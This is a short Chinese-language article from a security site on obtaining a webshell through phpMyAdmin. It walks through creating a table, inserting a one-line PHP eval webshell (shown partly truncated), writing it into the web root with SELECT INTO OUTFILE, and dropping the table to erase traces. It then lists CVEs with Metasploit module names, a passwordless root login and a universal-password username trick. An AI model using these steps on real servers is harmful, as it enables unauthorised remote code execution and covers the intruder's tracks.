phpMydmin的GetShell思路

来源:岁月联盟 编辑:猪蛋儿 时间:2020-02-16
进入一个数据库,新建数据表。
名字随意,这里为shell_table
字段数填1

添加字段
字段名任意,这里为xiaoma
字段类型为TEXT

在该表中点击插入,值为一句话木马
  eval($_POST[pwd]); ?>'

执行SQL查询,将该表中的内容导出到指定文件
 -- 假设物理路径为 "G:/phpStudy/WWW"
 select * from shell_table into outfile "G:/phpstudy/WWW/shell.php";

删除该表,抹除痕迹
 Drop TABLE IF EXISTS shell_table;
以上步骤也可以通过MySQL语句执行
 Create TABLE shell_table (xiaoma text NOT NULL) -- 建表
 Insert INTO shell_table (xiaoma) VALUES('');  -- 写入
 select * from shell_table into outfile 'G:/phpstudy/WWW/shell.php';   -- 导出
 Drop TABLE IF EXISTS shell_table;    -- 删表
特殊版本GetShell
CVE-2013-3238
影响版本:3.5.x
利用模块:exploit/multi/http/phpmyadminpregreplace
CVE-2012-5159
影响版本:phpMyAdmin v3.5.2.2
利用模块:exploit/multi/http/phpmyadmin3522_backdoor
CVE-2009-1151
PhpMyAdmin配置文件/config/config.inc.php存在命令执行
影响版本:2.11.x
利用模块:exploit/unix/webapp/phpmyadmin_config
弱口令&万能密码
弱口令:版本phpmyadmin2.11.9.2, 直接root用户登陆,无需密码
万能密码:版本2.11.3 / 2.11.4,用户名’localhost’@'@”则登录成功
 

参考:

phpmyadmin getshell之利用日志文件

mysql备份一句话

phpmyadmin getshell姿势

上一页  [1] [2]